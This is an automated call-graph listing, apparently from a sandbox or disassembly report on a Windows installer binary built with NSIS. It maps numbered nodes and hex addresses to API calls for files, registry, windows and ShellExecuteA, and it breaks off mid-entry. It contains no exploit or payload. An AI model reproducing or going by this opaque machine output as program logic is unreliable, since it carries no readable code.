3296->3297 3298 40560a 3 API calls 3296->3298 3297->3232 3299 4030b5 CreateDirectoryA 3298->3299 3400 40583a 3299->3400 3404 40580b GetFileAttributesA CreateFileA 3302->3404 3304 402c6b 3324 402c7b 3304->3324 3405 405b7a lstrcpynA 3304->3405 3306 402c91 3307 405651 2 API calls 3306->3307 3308 402c97 3307->3308 3406 405b7a lstrcpynA 3308->3406 3310 402ca2 GetFileSize 3311 402d9e 3310->3311 3329 402cb9 3310->3329 3407 402bc7 3311->3407 3313 402da7 3315 402dd7 GlobalAlloc 3313->3315 3313->3324 3444 403080 SetFilePointer 3313->3444 3418 403080 SetFilePointer 3315->3418 3316 402e0a 3321 402bc7 6 API calls 3316->3321 3319 402dc0 3322 40306a ReadFile 3319->3322 3320 402df2 3419 402e64 3320->3419 3321->3324 3325 402dcb 3322->3325 3324->3240 3325->3315 3325->3324 3326 402bc7 6 API calls 3326->3329 3327 402dfe 3327->3324 3327->3327 3328 402e3b SetFilePointer 3327->3328 3328->3324 3329->3311 3329->3316 3329->3324 3329->3326 3441 40306a 3329->3441 3331 405ea5 3 API calls 3330->3331 3332 403617 3331->3332 3333 40361d 3332->3333 3334 40362f 3332->3334 3455 405ad8 wsprintfA 3333->3455 3335 405a61 3 API calls 3334->3335 3336 40365a 3335->3336 3338 403678 lstrcatA 3336->3338 3340 405a61 3 API calls 3336->3340 3339 40362d 3338->3339 3446 4038c8 3339->3446 3340->3338 3343 4056f8 18 API calls 3344 4036aa 3343->3344 3345 403733 3344->3345 3347 405a61 3 API calls 3344->3347 3346 4056f8 18 API calls 3345->3346 3348 403739 3346->3348 3349 4036d6 3347->3349 3350 403749 LoadImageA 3348->3350 3351 405b9c 18 API calls 3348->3351 3349->3345 3354 4036f2 lstrlenA 3349->3354 3358 405635 CharNextA 3349->3358 3352 403770 RegisterClassA 3350->3352 3353 4037ef 3350->3353 3351->3350 3355 4037a6 SystemParametersInfoA CreateWindowExA 3352->3355 3383 4037f9 3352->3383 3356 40140b 2 API calls 3353->3356 3359 403700 lstrcmpiA 3354->3359 3360 403726 3354->3360 3355->3353 3357 4037f5 3356->3357 3364 4038c8 19 API calls 3357->3364 3357->3383 3362 4036f0 3358->3362 3359->3360 3363 403710 GetFileAttributesA 3359->3363 3361 40560a 3 API calls 3360->3361 3365 40372c 3361->3365 3362->3354 3366 40371c 3363->3366 3368 403806 3364->3368 3456 405b7a lstrcpynA 3365->3456 3366->3360 3367 405651 2 API calls 3366->3367 3367->3360 3370 403812 ShowWindow LoadLibraryA 3368->3370 3371 403895 3368->3371 3372 403831 LoadLibraryA 3370->3372 3373 403838 GetClassInfoA 3370->3373 3374 404f37 5 API calls 3371->3374 3372->3373 3376 403862 DialogBoxParamA 3373->3376 3377 40384c GetClassInfoA RegisterClassA 3373->3377 3375 40389b 3374->3375 3378 4038b7 3375->3378 3379 40389f 3375->3379 3380 40140b 2 API calls 3376->3380 3377->3376 3381 40140b 2 API calls 3378->3381 3382 40140b 2 API calls 3379->3382 3379->3383 3380->3383 3381->3383 3382->3383 3383->3287 3384->3230 3385->3272 3386->3277 3388 403541 3387->3388 3389 403533 CloseHandle 3387->3389 3458 40356e 3388->3458 3389->3388 3392 40543a 71 API calls 3393 40338a OleUninitialize 3392->3393 3393->3251 3393->3252 3396 4053a3 3394->3396 3395 4033a8 ExitProcess 3396->3395 3397 4053b7 MessageBoxIndirectA 3396->3397 3397->3395 3398->3264 3399->3289 3401 405845 GetTickCount GetTempFileNameA 3400->3401 3402 405872 3401->3402 3403 4030c9 3401->3403 3402->3401 3402->3403 3403->3232 3404->3304 3405->3306 3406->3310 3408 402bd0 3407->3408 3409 402be8 3407->3409 3410 402be0 3408->3410 3411 402bd9 DestroyWindow 3408->3411 3412 402bf0 3409->3412 3413 402bf8 GetTickCount 3409->3413 3410->3313 3411->3410 3414 405ede 2 API calls 3412->3414 3415 402c06 CreateDialogParamA ShowWindow 3413->3415 3416 402c29 3413->3416 3417 402bf6 3414->3417 3415->3416 3416->3313 3417->3313 3418->3320 3420 402e7c 3419->3420 3421 402ea9 3420->3421 3445 403080 SetFilePointer 3420->3445 3422 40306a ReadFile 3421->3422 3424 402eb4 3422->3424 3425 402ec6 GetTickCount 3424->3425 3426 402ff9 3424->3426 3428 402fe4 3424->3428 3425->3428 3438 402eef 3425->3438 3427 403045 3426->3427 3430 402ffd 3426->3430 3429 40306a ReadFile 3427->3429 3428->3327 3429->3428 3430->3428 3432 40306a ReadFile 3430->3432 3433 40301d WriteFile 3430->3433 3431 40306a ReadFile 3431->3438 3432->3430 3433->3428 3434 403032 3433->3434 3434->3428 3434->3430 3435 403043 3434->3435 3435->3428 3436 402f45 GetTickCount 3436->3438 3437 402f6e MulDiv wsprintfA 3439 404e65 25 API calls 3437->3439 3438->3428 3438->3431 3438->3436 3438->3437 3440 402fac WriteFile 3438->3440 3439->3438 3440->3428 3440->3438 3442 405883 ReadFile 3441->3442 3443 40307d 3442->3443 3443->3329 3444->3319 3445->3421 3447 4038dc 3446->3447 3457 405ad8 wsprintfA 3447->3457 3449 40394d 3450 405b9c 18 API calls 3449->3450 3451 403959 SetWindowTextA 3450->3451 3452 403688 3451->3452 3453 403975 3451->3453 3452->3343 3453->3452 3454 405b9c 18 API calls 3453->3454 3454->3453 3455->3339 3456->3345 3457->3449 3459 40357c 3458->3459 3460 403546 3459->3460 3461 403581 FreeLibrary GlobalFree 3459->3461 3460->3392 3461->3460 3461->3461 3579 401ccc GetDlgItem GetClientRect 3580 4029ff 18 API calls 3579->3580 3581 401cfc LoadImageA SendMessageA 3580->3581 3582 402894 3581->3582 3583 401d1a DeleteObject 3581->3583 3583->3582 3584 401650 3585 4029ff 18 API calls 3584->3585 3586 401657 3585->3586 3587 4029ff 18 API calls 3586->3587 3588 401660 3587->3588 3589 4029ff 18 API calls 3588->3589 3590 401669 MoveFileA 3589->3590 3591 401675 3590->3591 3592 40167c 3590->3592 3593 401423 25 API calls 3591->3593 3594 405e7e 2 API calls 3592->3594 3596 402183 3592->3596 3593->3596 3595 40168b 3594->3595 3595->3596 3597 405a2e 40 API calls 3595->3597 3597->3591 3598 4024d3 3599 4024d8 3598->3599 3600 4024e9 3598->3600 3601 4029e2 18 API calls 3599->3601 3602 4029ff 18 API calls 3600->3602 3604 4024df 3601->3604 3603 4024f0 lstrlenA 3602->3603 3603->3604 3605 402665 3604->3605 3606 40250f WriteFile 3604->3606 3606->3605 3607 4025d5 3608 4025dc 3607->3608 3611 402841 3607->3611 3609 4029e2 18 API calls 3608->3609 3610 4025e7 3609->3610 3612 4025ee SetFilePointer 3610->3612 3612->3611 3613 4025fe 3612->3613 3615 405ad8 wsprintfA 3613->3615 3615->3611 3616 4014d6 3617 4029e2 18 API calls 3616->3617 3618 4014dc Sleep 3617->3618 3620 402894 3618->3620 3621 401dd8 3622 4029ff 18 API calls 3621->3622 3623 401dde 3622->3623 3624 4029ff 18 API calls 3623->3624 3625 401de7 3624->3625 3626 4029ff 18 API calls 3625->3626 3627 401df0 3626->3627 3628 4029ff 18 API calls 3627->3628 3629 401df9 3628->3629 3630 401423 25 API calls 3629->3630 3631 401e00 ShellExecuteA 3630->3631 3632 401e2d 3631->3632 3633 404dd9 3634 404de9 3633->3634 3635 404dfd 3633->3635 3636 404e46 3634->3636 3637 404def 3634->3637 3638 404e05 IsWindowVisible 3635->3638 3644 404e1c 3635->3644 3639 404e4b CallWindowProcA 3636->3639 3640 403eb4 SendMessageA 3637->3640 3638->3636 3641 404e12 3638->3641 3643 404df9 3639->3643 3640->3643 3646 404730 SendMessageA 3641->3646 3644->3639 3651 4047b0 3644->3651 3647 404753 GetMessagePos ScreenToClient SendMessageA 3646->3647 3648 40478f SendMessageA 3646->3648 3649 404787 3647->3649 3650 40478c 3647->3650 3648->3649 3649->3644 3650->3648 3660 405b7a lstrcpynA 3651->3660 3653 4047c3 3661 405ad8 wsprintfA 3653->3661 3655 4047cd 3656 40140b 2 API calls 3655->3656 3657 4047d6 3656->3657 3662 405b7a lstrcpynA 3657->3662 3659 4047dd 3659->3636 3660->3653 3661->3655 3662->3659 3663 40155b 3664 401577 ShowWindow 3663->3664 3665 40157e 3663->3665 3664->3665 3666 40158c ShowWindow 3665->3666 3667 402894 3665->3667 3666->3667 3668 401edc 3669 4029ff 18 API calls 3668->3669 3670 401ee3 GetFileVersionInfoSizeA 3669->3670 3671 401f06 GlobalAlloc 3670->3671 3673 401f5c 3670->3673 3672 401f1a GetFileVersionInfoA 3671->3672 3671->3673 3672->3673 3674 401f2b VerQueryValueA 3672->3674 3674->3673 3675 401f44 3674->3675 3679 405ad8 wsprintfA 3675->3679 3677 401f50 3680 405ad8 wsprintfA 3677->3680 3679->3677 3680->3673 3681 40425f 3682 404295 3681->3682 3683 40426f 3681->3683 3685 403ecf 8 API calls 3682->3685 3684 403e68 19 API calls 3683->3684 3686 40427c SetDlgItemTextA 3684->3686 3687 4042a1 3685->3687 3686->3682 3688 4047e2 GetDlgItem GetDlgItem 3689 404834 7 API calls 3688->3689 3698 404a4c 3688->3698 3690 4048d7 DeleteObject 3689->3690 3691 4048ca SendMessageA 3689->3691 3692 4048e0 3690->3692 3691->3690 3694 404917 3692->3694 3697 405b9c 18 API calls 3692->3697 3693 404b30 3696 404bdc 3693->3696 3705 404b89 SendMessageA 3693->3705 3731 404a3f 3693->3731 3695 403e68 19 API calls 3694->3695 3699 40492b 3695->3699 3700 404be6 SendMessageA 3696->3700 3701 404bee 3696->3701 3702 4048f9 SendMessageA SendMessageA 3697->3702 3698->3693 3703 404730 5 API calls 3698->3703 3722 404abd 3698->3722 3704 403e68 19 API calls 3699->3704 3700->3701 3708 404c00 ImageList_Destroy 3701->3708 3709 404c07 3701->3709 3725 404c17 3701->3725 3702->3692 3703->3722 3723 404939 3704->3723 3710 404b9e SendMessageA 3705->3710 3705->3731 3706 403ecf 8 API calls 3711 404dd2 3706->3711 3707 404b22 SendMessageA 3707->3693 3708->3709 3712 404c10 GlobalFree 3709->3712 3709->3725 3714 404bb1 3710->3714 3712->3725 3713 404a0d GetWindowLongA SetWindowLongA 3717 404a26 3713->3717 3726 404bc2 SendMessageA 3714->3726 3715 404d86 3716 404d98 ShowWindow GetDlgItem ShowWindow 3715->3716 3715->3731 3716->3731 3718 404a44 3717->3718 3719 404a2c ShowWindow 3717->3719 3740 403e9d SendMessageA 3718->3740 3739 403e9d SendMessageA 3719->3739 3722->3693 3722->3707 3723->3713 3724 404988 SendMessageA 3723->3724 3727 404a07 3723->3727 3728 4049c4 SendMessageA 3723->3728 3729 4049d5 SendMessageA 3723->3729 3724->3723 3725->3715 3730 4047b0 4 API calls 3725->3730 3735 404c52 3725->3735 3726->3696 3727->3713 3727->3717 3728->3723 3729->3723 3730->3735 3731->3706 3732 404d5c InvalidateRect 3732->3715 3733 404d72 3732->3733 3741 40464e 3733->3741 3734 404c80 SendMessageA 3737 404c96 3734->3737 3735->3734 3735->3737 3737->3732 3738 404d0a SendMessageA SendMessageA 3737->3738 3738->3737 3739->3731 3740->3698 3742 404668 3741->3742 3743 405b9c 18 API calls 3742->3743 3744 40469d 3743->3744 3745 405b9c 18 API calls 3744->3745 3746 4046a8 3745->3746 3747 405b9c 18 API calls 3746->3747 3748 4046d9 lstrlenA wsprintfA SetDlgItemTextA 3747->3748 3748->3715 3754 4018e3 3755 40191a 3754->3755 3756 4029ff 18 API calls 3755->3756 3757 40191f 3756->3757 3758 40543a 71 API calls 3757->3758 3759 401928 3758->3759 3760 4018e6 3761 4029ff 18 API calls 3760->3761 3762 4018ed 3761->3762 3763 40538e MessageBoxIndirectA 3762->3763 3764 4018f6 3763->3764 3077 401f68 3078 401f7a 3077->3078 3079 402028 3077->3079 3080 4029ff 18 API calls 3078->3080 3081 401423 25 API calls 3079->3081 3082 401f81 3080->3082 3087 402183 3081->3087 3083 4029ff 18 API calls 3082->3083 3084 401f8a 3083->3084 3085 401f92 GetModuleHandleA 3084->3085 3086 401f9f LoadLibraryExA 3084->3086 3085->3086 3088 401faf GetProcAddress 3085->3088 3086->3079 3086->3088 3089 401ffb 3088->3089 3090 401fbe 3088->3090 3091 404e65 25 API calls 3089->3091 3092 401423 25 API calls 3090->3092 3093 401fce 3090->3093 3091->3093 3092->3093 3093->3087 3094 40201c FreeLibrary 3093->3094 3094->3087 3765 4045e8 3766 404614 3765->3766 3767 4045f8 3765->3767 3769 404647 3766->3769 3770 40461a SHGetPathFromIDListA 3766->3770 3776 405372 GetDlgItemTextA 3767->3776 3772 40462a 3770->3772 3775 404631 SendMessageA 3770->3775 3771 404605 SendMessageA 3771->3766 3774 40140b 2 API calls 3772->3774 3774->3775 3775->3769 3776->3771 3777 40286f SendMessageA 3778 402894 3777->3778 3779 402889 InvalidateRect 3777->3779 3779->3778 3780 4014f0 SetForegroundWindow 3781 402894 3780->3781 3782 401af0 3783 4029ff 18 API calls 3782->3783 3784 401af7 3783->3784 3785 4029e2 18 API calls 3784->3785 3786 401b00 wsprintfA 3785->3786 3787 402894 3786->3787 3788 4019f1 3789 4029ff 18 API calls 3788->3789 3790 4019fa ExpandEnvironmentStringsA 3789->3790 3791 401a0e 3790->3791 3793 401a21 3790->3793 3792 401a13 lstrcmpA 3791->3792 3791->3793 3792->3793 3794 401c78 3795 4029e2 18 API calls 3794->3795 3796 401c7e IsWindow 3795->3796 3797 4019e1 3796->3797 3798 403f7c lstrcpynA lstrlenA 3799 4014fe 3800 401506 3799->3800 3802 401519 3799->3802 3801 4029e2 18 API calls 3800->3801 3801->3802 3803 401000 3804 401037 BeginPaint GetClientRect 3803->3804 3805 40100c DefWindowProcA 3803->3805 3807 4010f3 3804->3807 3808 401179 3805->3808 3809 401073 CreateBrushIndirect FillRect DeleteObject 3807->3809 3810 4010fc 3807->3810 3809->3807 3811 401102 CreateFontIndirectA 3810->3811 3812 401167 EndPaint 3810->3812 3811->3812 3813 401112 6 API calls 3811->3813 3812->3808 3813->3812 3814 402281 3815 4029ff 18 API calls 3814->3815 3816 402292 3815->3816 3817 4029ff 18 API calls 3816->3817 3818 40229b 3817->3818 3819 4029ff 18 API calls 3818->3819 3820 4022a5 GetPrivateProfileStringA 3819->3820 3821 402604 3822 402894 3821->3822 3823 40260b 3821->3823 3824 402611 FindClose 3823->3824 3824->3822 3825 401705 3826 4029ff 18 API calls 3825->3826 3827 40170c SearchPathA 3826->3827 3828 401727 3827->3828 3829 402685 3830 4029ff 18 API calls 3829->3830 3831 402693 3830->3831 3832 4026a9 3831->3832 3833 4029ff 18 API calls 3831->3833 3834 4057e6 2 API calls 3832->3834 3833->3832 3835 4026af 3834->3835 3855 40580b GetFileAttributesA CreateFileA 3835->3855 3837 4026bc 3838 402765 3837->3838 3839 4026c8 GlobalAlloc 3837->3839 3842 402780 3838->3842 3843 40276d DeleteFileA 3838->3843 3840 4026e1 3839->3840 3841 40275c CloseHandle 3839->3841 3856 403080 SetFilePointer 3840->3856 3841->3838 3843->3842 3845 4026e7 3846 40306a ReadFile 3845->3846 3847 4026f0 GlobalAlloc 3846->3847 3848 402700 3847->3848 3849 402734 WriteFile GlobalFree 3847->3849 3850 402e64 33 API calls 3848->3850 3851 402e64 33 API calls 3849->3851 3854 40270d 3850->3854 3852 402759 3851->3852 3852->3841 3853 40272b GlobalFree 3853->3849 3854->3853 3855->3837 3856->3845 3857 402786 3858 4029e2 18 API calls 3857->3858 3859 40278c 3858->3859 3860 4027b0 3859->3860 3861 4027c7 3859->3861 3862 402665 3859->3862 3863 4027b5 3860->3863 3870 4027c4 3860->3870 3864 4027d1 3861->3864 3865 4027dd 3861->3865 3871 405b7a lstrcpynA 3863->3871 3866 4029e2 18 API calls 3864->3866 3867 405b9c 18 API calls 3865->3867 3866->3870 3867->3870 3870->3862 3872 405ad8 wsprintfA 3870->3872 3871->3862 3872->3862 3873 40280c 3874 4029e2 18 API calls 3873->3874 3875 402812 3874->3875 3876 402843 3875->3876 3877 402665 3875->3877 3879 402820 3875->3879 3876->3877 3878 405b9c 18 API calls 3876->3878 3878->3877 3879->3877 3881 405ad8 wsprintfA 3879->3881 3881->3877 3882 40218c 3883 4029ff 18 API calls 3882->3883 3884 402192 3883->3884 3885 4029ff 18 API calls 3884->3885 3886 40219b 3885->3886 3887 4029ff 18 API calls 3886->3887 3888 4021a4 3887->3888 3889 405e7e 2 API calls 3888->3889 3890 4021ad 3889->3890 3891 4021b1 3890->3891 3892 4021be lstrlenA lstrlenA 3890->3892 3894 404e65 25 API calls 3891->3894 3896 4021b9 3891->3896 3893 404e65 25 API calls 3892->3893 3895 4021fa SHFileOperationA 3893->3895 3894->3896 3895->3891 3895->3896 3897 40220e 3898 402228 3897->3898 3899 402215 3897->3899 3900 405b9c 18 API calls 3899->3900 3901 402222 3900->3901 3902 40538e MessageBoxIndirectA 3901->3902 3902->3898 3903 401490 3904 404e65 25 API calls 3903->3904 3905 401497 3904->3905 3906 401b11 3907 401b62 3906->3907 3908 401b1e 3906->3908 3910 401b66 3907->3910 3911 401b8b GlobalAlloc 3907->3911 3909 401ba6 3908->3909 3914 401b35 3908->3914 3913 405b9c 18 API calls 3909->3913 3919 402228 3909->3919 3910->3919 3927 405b7a lstrcpynA 3910->3927 3912 405b9c 18 API calls 3911->3912 3912->3909 3915 402222 3913->3915 3925 405b7a lstrcpynA 3914->3925 3921 40538e MessageBoxIndirectA 3915->3921 3918 401b78 GlobalFree 3918->3919 3920 401b44 3926 405b7a lstrcpynA 3920->3926 3921->3919 3923 401b53 3928 405b7a lstrcpynA 3923->3928 3925->3920 3926->3923 3927->3918 3928->3919 3001 403995 3002 403ae8 3001->3002 3003 4039ad 3001->3003 3004 403b39 3002->3004 3005 403af9 GetDlgItem GetDlgItem 3002->3005 3003->3002 3006 4039b9 3003->3006 3010 403b93 3004->3010 3018 401389 2 API calls 3004->3018 3009 403e68 19 API calls 3005->3009 3007 4039c4 SetWindowPos 3006->3007 3008 4039d7 3006->3008 3007->3008 3011 4039f4 3008->3011 3012 4039dc ShowWindow 3008->3012 3013 403b23 SetClassLongA 3009->3013 3014 403eb4 SendMessageA 3010->3014 3019 403ae3 3010->3019 3015 403a16 3011->3015 3016 4039fc DestroyWindow 3011->3016 3012->3011 3017 40140b 2 API calls 3013->3017 3041 403ba5 3014->3041 3021 403a1b SetWindowLongA 3015->3021 3022 403a2c 3015->3022 3020 403df1 3016->3020 3017->3004 3023 403b6b 3018->3023 3020->3019 3029 403e22 ShowWindow 3020->3029 3021->3019 3026 403ad5 3022->3026 3027 403a38 GetDlgItem 3022->3027 3023->3010 3028 403b6f SendMessageA 3023->3028 3024 40140b 2 API calls 3024->3041 3025 403df3 DestroyWindow EndDialog 3025->3020 3032 403ecf 8 API calls 3026->3032 3030 403a68 3027->3030 3031 403a4b SendMessageA IsWindowEnabled 3027->3031 3028->3019 3029->3019 3034 403a75 3030->3034 3035 403a88 3030->3035 3036 403abc SendMessageA 3030->3036 3045 403a6d 3030->3045 3031->3019 3031->3030 3032->3019 3033 405b9c 18 API calls 3033->3041 3034->3036 3034->3045 3038 403a90 3035->3038 3039 403aa5 3035->3039 3036->3026 3037 403e41 SendMessageA 3040 403aa3 3037->3040 3074 40140b 3038->3074 3043 40140b 2 API calls 3039->3043 3040->3026 3041->3019 3041->3024 3041->3025 3041->3033 3044 403e68 19 API calls 3041->3044 3047 403e68 19 API calls 3041->3047 3062 403d33 DestroyWindow 3041->3062 3046 403aac 3043->3046 3044->3041 3045->3037 3046->3026 3046->3045 3048 403c20 GetDlgItem 3047->3048 3049 403c35 3048->3049 3050 403c3d ShowWindow KiUserCallbackDispatcher 3048->3050 3049->3050 3071 403e8a KiUserCallbackDispatcher 3050->3071 3052 403c67 EnableWindow 3055 403c7b 3052->3055 3053 403c80 GetSystemMenu EnableMenuItem SendMessageA 3054 403cb0 SendMessageA 3053->3054 3053->3055 3054->3055 3055->3053 3072 403e9d SendMessageA 3055->3072 3073 405b7a lstrcpynA 3055->3073 3058 403cde lstrlenA 3059 405b9c 18 API calls 3058->3059 3060 403cef SetWindowTextA 3059->3060 3061 401389 2 API calls 3060->3061 3061->3041 3062->3020 3063 403d4d CreateDialogParamA 3062->3063 3063->3020 3064 403d80 3063->3064 3065 403e68 19 API calls 3064->3065 3066 403d8b GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3065->3066 3067 401389 2 API calls 3066->3067 3068 403dd1 3067->3068 3068->3019 3069 403dd9 ShowWindow 3068->3069 3070 403eb4 SendMessageA 3069->3070 3070->3020 3071->3052 3072->3055 3073->3058 3075 401389 2 API calls 3074->3075 3076 401420 3075->3076 3076->3045 3929 401595 3930 4029ff 18 API calls 3929->3930 3931 40159c SetFileAttributesA 3930->3931 3932 4015ae 3931->3932 3933 401c95 3934 4029e2 18 API calls 3933->3934 3935 401c9c 3934->3935 3936 4029e2 18 API calls 3935->3936 3937 401ca4 GetDlgItem 3936->3937 3938 4024cd 3937->3938 3095 401918 3096 40191a 3095->3096 3097 4029ff 18 API calls 3096->3097 3098 40191f 3097->3098 3101 40543a 3098->3101 3142 4056f8 3101->3142 3104 405462 DeleteFileA 3106 401928 3104->3106 3105 405479 3107 4055b1 3105->3107 3156 405b7a lstrcpynA 3105->3156 3107->3106 3175 405e7e FindFirstFileA 3107->3175 3109 40549f 3110 4054b2 3109->3110 3111 4054a5 lstrcatA 3109->3111 3157 405651 lstrlenA 3110->3157 3113 4054b8 3111->3113 3116 4054c6 lstrcatA 3113->3116 3117 4054bd 3113->3117 3118 4054d1 lstrlenA FindFirstFileA 3116->3118 3117->3116 3117->3118 3120 4055a7 3118->3120 3140 4054f5 3118->3140 3119 4055cf 3178 40560a lstrlenA CharPrevA 3119->3178 3120->3107 3122 405635 CharNextA 3122->3140 3124 4053f2 5 API calls 3125 4055e1 3124->3125 3126 4055e5 3125->3126 3127 4055fb 3125->3127 3126->3106 3132 404e65 25 API calls 3126->3132 3128 404e65 25 API calls 3127->3128 3128->3106 3129 405586 FindNextFileA 3131 40559e FindClose 3129->3131 3129->3140 3131->3120 3133 4055f2 3132->3133 3134 405a2e 40 API calls 3133->3134 3136 4055f9 3134->3136 3136->3106 3137 40543a 64 API calls 3137->3140 3138 404e65 25 API calls 3138->3129 3139 404e65 25 API calls 3139->3140 3140->3122 3140->3129 3140->3137 3140->3138 3140->3139 3161 405b7a lstrcpynA 3140->3161 3162 4053f2 3140->3162 3170 405a2e 3140->3170 3181 405b7a lstrcpynA 3142->3181 3144 405709 3145 4056a3 4 API calls 3144->3145 3146 40570f 3145->3146 3147 40545a 3146->3147 3148 405de5 5 API calls 3146->3148 3147->3104 3147->3105 3154 40571f 3148->3154 3149 40574a lstrlenA 3150 405755 3149->3150 3149->3154 3152 40560a 3 API calls 3150->3152 3151 405e7e 2 API calls 3151->3154 3153 40575a GetFileAttributesA 3152->3153 3153->3147 3154->3147 3154->3149 3154->3151 3155 405651 2 API calls 3154->3155 3155->3149 3156->3109 3158 40565e 3157->3158 3159 405663 CharPrevA 3158->3159 3160 40566f 3158->3160 3159->3158 3159->3160 3160->3113 3161->3140 3182 4057e6 GetFileAttributesA 3162->3182 3165 40541f 3165->3140 3166 405415 DeleteFileA 3168 40541b 3166->3168 3167 40540d RemoveDirectoryA 3167->3168 3168->3165 3169 40542b SetFileAttributesA 3168->3169 3169->3165 3171 405ea5 3 API calls 3170->3171 3173 405a35 3171->3173 3174 405a56 3173->3174 3185 4058b2 lstrcpyA 3173->3185 3174->3140 3176 405e94 FindClose 3175->3176 3177 4055cb 3175->3177 3176->3177 3177->3106 3177->3119 3179 405624 lstrcatA 3178->3179 3180 4055d5 3178->3180 3179->3180 3180->3124 3181->3144 3183 4053fe 3182->3183 3184 4057f8 SetFileAttributesA 3182->3184 3183->3165 3183->3166 3183->3167 3184->3183 3186 405901 GetShortPathNameA 3185->3186 3187 4058db 3185->3187 3189 405916 3186->3189 3190 405a28 3186->3190 3210 40580b GetFileAttributesA CreateFileA 3187->3210 3189->3190 3192 40591e wsprintfA 3189->3192 3190->3174 3191 4058e5 CloseHandle GetShortPathNameA 3191->3190 3193 4058f9 3191->3193 3194 405b9c 18 API calls 3192->3194 3193->3186 3193->3190 3195 405946 3194->3195 3211 40580b GetFileAttributesA CreateFileA 3195->3211 3197 405953 3197->3190 3198 405962 GetFileSize GlobalAlloc 3197->3198 3199 405a21 CloseHandle 3198->3199 3200 405984 3198->3200 3199->3190 3212 405883 ReadFile 3200->3212 3205 4059a3 lstrcpyA 3208 4059c5 3205->3208 3206 4059b7 3207 405770 4 API calls 3206->3207 3207->3208 3209 4059fc SetFilePointer WriteFile GlobalFree 3208->3209 3209->3199 3210->3191 3211->3197 3213 4058a1 3212->3213 3213->3199 3214 405770 lstrlenA 3213->3214 3215 4057b1 lstrlenA 3214->3215 3216 4057b9 3215->3216 3217 40578a lstrcmpiA 3215->3217 3216->3205 3216->3206 3217->3216 3218 4057a8 CharNextA 3217->3218 3218->3215 3939 40251b 3940 4029e2 18 API calls 3939->3940 3943 402525 3940->3943 3941 40258f 3942 405883 ReadFile 3942->3943 3943->3941 3943->3942 3944 402591 3943->3944 3946 4025a1 3943->3946 3948 405ad8 wsprintfA 3944->3948 3946->3941 3947 4025b7 SetFilePointer 3946->3947 3947->3941 3948->3941 3479 40231e 3480 402324 3479->3480 3481 4029ff 18 API calls 3480->3481 3482 402336 3481->3482 3483 4029ff 18 API calls 3482->3483 3484 402340 RegCreateKeyExA 3483->3484 3485 402894 3484->3485 3486 40236a 3484->3486 3487 402382 3486->3487 3488 4029ff 18 API calls 3486->3488 3489 40238e 3487->3489 3491 4029e2 18 API calls 3487->3491 3490 40237b lstrlenA 3488->3490 3492 4023a9 RegSetValueExA 3489->3492 3493 402e64 33 API calls 3489->3493 3490->3487 3491->3489 3494 4023bf RegCloseKey 3492->3494 3493->3492 3494->3485 3949 40261e 3950 402621 3949->3950 3953 402639 3949->3953 3951 40262e FindNextFileA 3950->3951 3952 402678 3951->3952 3951->3953 3955 405b7a lstrcpynA 3952->3955 3955->3953 3956 4016a1 3957 4029ff 18 API calls 3956->3957 3958 4016a7 GetFullPathNameA 3957->3958 3961 4016be 3958->3961 3965 4016df 3958->3965 3959 4016f3 GetShortPathNameA 3960 402894 3959->3960 3962 405e7e 2 API calls 3961->3962 3961->3965 3963 4016cf 3962->3963 3963->3965 3966 405b7a lstrcpynA 3963->3966 3965->3959 3965->3960 3966->3965 2891 404fa3 2892 405150 2891->2892 2893 404fc5 GetDlgItem GetDlgItem GetDlgItem 2891->2893 2895 405180 2892->2895 2896 405158 GetDlgItem CreateThread CloseHandle 2892->2896 2936 403e9d SendMessageA 2893->2936 2898 4051ae 2895->2898 2900 405196 ShowWindow ShowWindow 2895->2900 2901 4051cf 2895->2901 2896->2895 2959 404f37 OleInitialize 2896->2959 2897 405036 2905 40503d GetClientRect GetSystemMetrics SendMessageA SendMessageA 2897->2905 2899 405209 2898->2899 2902 4051e2 ShowWindow 2898->2902 2903 4051be 2898->2903 2899->2901 2912 405216 SendMessageA 2899->2912 2941 403e9d SendMessageA 2900->2941 2945 403ecf 2901->2945 2908 405202 2902->2908 2909 4051f4 2902->2909 2942 403e41 2903->2942 2910 405090 SendMessageA SendMessageA 2905->2910 2911 4050ac 2905->2911 2914 403e41 SendMessageA 2908->2914 2913 404e65 25 API calls 2909->2913 2910->2911 2915 4050b1 SendMessageA 2911->2915 2916 4050bf 2911->2916 2917 4051db 2912->2917 2918 40522f CreatePopupMenu 2912->2918 2913->2908 2914->2899 2915->2916 2937 403e68 2916->2937 2920 405b9c 18 API calls 2918->2920 2921 40523f AppendMenuA 2920->2921 2923 405270 TrackPopupMenu 2921->2923 2924 40525d GetWindowRect 2921->2924 2922 4050cf 2925 4050d8 ShowWindow 2922->2925 2926 40510c GetDlgItem SendMessageA 2922->2926 2923->2917 2927 40528c 2923->2927 2924->2923 2928 4050fb 2925->2928 2929 4050ee ShowWindow 2925->2929 2926->2917 2930 405133 SendMessageA SendMessageA 2926->2930 2931 4052ab SendMessageA 2927->2931 2940 403e9d SendMessageA 2928->2940 2929->2928 2930->2917 2931->2931 2932 4052c8 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 2931->2932 2934 4052ea SendMessageA 2932->2934 2934->2934 2935 40530c GlobalUnlock SetClipboardData CloseClipboard 2934->2935 2935->2917 2936->2897 2938 405b9c 18 API calls 2937->2938 2939 403e73 SetDlgItemTextA 2938->2939 2939->2922 2940->2926 2941->2898 2943 403e48 2942->2943 2944 403e4e SendMessageA 2942->2944 2943->2944 2944->2901 2946 403ee7 GetWindowLongA 2945->2946 2955 403f70 2945->2955 2947 403ef8 2946->2947 2946->2955 2948 403f07 GetSysColor 2947->2948 2949 403f0a 2947->2949 2948->2949 2950 403f10 SetTextColor 2949->2950 2951 403f1a SetBkMode 2949->2951 2950->2951 2952 403f32 GetSysColor 2951->2952 2953 403f38 2951->2953 2952->2953 2954 403f3f SetBkColor 2953->2954 2956 403f49 2953->2956 2954->2956 2955->2917 2956->2955 2957 403f63 CreateBrushIndirect 2956->2957 2958 403f5c DeleteObject 2956->2958 2957->2955 2958->2957 2966 403eb4 2959->2966 2961 404f5a 2965 404f81 2961->2965 2969 401389 2961->2969 2962 403eb4 SendMessageA 2963 404f93 CoUninitialize 2962->2963 2965->2962 2967 403ecc 2966->2967 2968 403ebd SendMessageA 2966->2968 2967->2961 2968->2967 2970 401390 2969->2970 2971 4013fe 2970->2971 2972 4013cb MulDiv SendMessageA 2970->2972 2971->2961 2972->2970 3967 401d26 GetDC GetDeviceCaps 3968 4029e2 18 API calls 3967->3968 3969 401d44 MulDiv ReleaseDC 3968->3969 3970 4029e2 18 API calls 3969->3970 3971 401d63 3970->3971 3972 405b9c 18 API calls 3971->3972 3973 